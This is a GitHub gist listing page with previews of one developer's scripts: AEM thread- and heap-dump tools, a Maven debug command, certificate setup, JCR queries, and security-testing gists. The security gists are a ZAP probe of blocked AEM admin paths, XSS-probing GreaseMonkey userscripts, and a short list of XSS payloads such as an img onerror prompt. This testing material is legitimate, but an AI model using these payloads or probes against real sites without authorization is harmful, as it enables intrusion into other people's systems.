Thomas Hartmann thomashartm
thomashartm
/ aem_threadump.sh
Last active
August 12, 2016 13:52
Create threaddumps of all running aem processes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Call as follows to generate 15 TDs for all instances with a break of 5 seconds: | |
| # ./aem_threadumps.sh 15 5 | |
| # Call as follows to generate 15 TDs for all instances with a break of 5 seconds and write them in a distinct working directory | |
| # ./aem_threadumps.sh 15 5 /home/user/data | |
| if [ $# -eq 0 ]; then | |
| echo >&2 "Creates threaddumps for running aem instances " | |
| echo >&2 " Usage: td [ [ ] ]" | |
| echo >&2 " Defaults: count = 10, delay = 1 (seconds)" |
thomashartm
/ aem_heapdump.sh
Created
August 3, 2016 15:01
Creates a heampdump for a particular pid or shows all pids for running aem instances
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Usage instructions | |
| # Make the script executable: | |
| # chmod u+x heapdump.sh | |
| # | |
| # Show all running aem instances and their pids | |
| # ./heapdumps.sh | |
| # Create a heampdump for a running aem instance | |
| # ./heapdumps.sh <pid> |
thomashartm
/ maven-debug
Last active
August 10, 2016 10:25
Debug Maven Build with random testOrder and disabled fork reusing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| mvn -Dmaven.surefire.debug="-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=6666 -Xnoagent -Djava.compiler=NONE" test -Dsurefire.runOrder=random -DreuseForks=false |
thomashartm
/ setup-certificate.sh
Last active
August 19, 2016 20:49
Generates a self signed ssl certificate, the matching keyfile and adds them to a folder names certificates. This script was originally in combination with local-ssl-proxy.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| CN="localhost" | |
| if [ $# -eq 0 ]; then | |
| echo >&2 "Creates a certificates folder and adds a certificate and a key" | |
| echo >&2 " Usage: setup-certificate.sh [ [ ] ]" | |
| echo >&2 " Defaults: ${CN}" | |
| fi |
thomashartm
/ kill-camera.sh
Last active
November 5, 2018 19:23
Fix script to deal the not connected. camera issue in Mac OSX. Shutdown the application that called the camera and call the script. The restart the application.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # script based on http://osxdaily.com/2013/12/27/fix-there-is-no-connected-camera-error-mac/ | |
| # chmod +x kill-camera.sh to make it executable | |
| sudo killall VDCAssistant | |
| sudo killall AppleCameraAssistant |
thomashartm
/ zap-dispatcher-security-check.js
Last active
February 27, 2018 00:33
Targeted ZAP Script to check for URLs that are prohibited when using the AEM dispatcher
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Targeted zap script to check for URLs that are prohibited when using the AEM dispatcher. | |
| * Usage: Select a a node in your site tree. Select the Invoke with Script option from your context menu and select this zapcript. | |
| * @author [email protected] | |
| */ | |
| paths = [ | |
| "/admin", | |
| "/system/console", | |
| "/dav/crx.default", | |
| "/crx", |
thomashartm
/ AEM SQL2 Queries
Last active
September 18, 2019 13:31
A collection of AEM related JCR queries in the SQL2 query language. Some of these queries might be project specific but are a nice blueprint for similar requirements.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Find all custom image components by resource type below /content | |
| SELECT * FROM [nt:unstructured] as r WHERE ISDESCENDANTNODE(r,'/content') AND [sling:resourceType] = 'project/components/par/image' | |
| SELECT * FROM [nt:unstructured] as r WHERE ISDESCENDANTNODE(r,'/content') AND [sling:resourceType] = 'project/components/par/image' AND [fileReference] IS NOT NULL | |
| # Find all users below a certain folder | |
| SELECT * FROM [rep:User] as r WHERE ISDESCENDANTNODE(r,'/home/users/community/project') | |
| SELECT * FROM [nt:unstructured] as r WHERE ISDESCENDANTNODE(r,'/home/users/community') AND [sling:resourceType] = 'cq/security/components/profile' AND [registrationDate] IS NOT NULL |
thomashartm
/ xssmonkey.user.js
Last active
October 21, 2024 09:53
XSS testing userscript for GreaseMonkey to for XSS issues with links and forms in a page. Based on ph3wl's XSS script.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name XSSMonkey | |
| // @namespace thartm | |
| // @description Identifies potential Cross Site Scripting (XSS) sinks in the currently displayed website and provides an easy option to probe them. Based on ph3wl's XSS script. | |
| // @include * | |
| // @require http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | |
| // ==/UserScript== | |
| // | |
| // Set your test string here |
thomashartm
/ jinxs2.user.js
Last active
April 30, 2017 16:49
Jinx 2.0 is a slightly adapted version of Martin Holst Swende's great GreaseMonkey script Jinx. Please see the visit the original code http://swende.se/projects/jinx.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name Jinx 2.0 | |
| // @namespace swende.se | |
| // @grant GM_registerMenuCommand | |
| // @description This is a slightly adapted version of Martin Holst Swende's great GM script Jinx. Please see the original code http://swende.se/projects/jinx.html | |
| // @version 1 | |
| // @include * | |
| // @require http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | |
| // ==/UserScript== | |
thomashartm
/ XSS vectors and filter evasion strings
Last active
April 20, 2025 19:45
Interesting XSS payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CUSTOM VECTORS | |
| "><img src=x onerror=prompt(1);> | |
| +123'];alert(1);[[' | |
| 123',alert(1),' | |
| 123\",term:alert(1)//\" |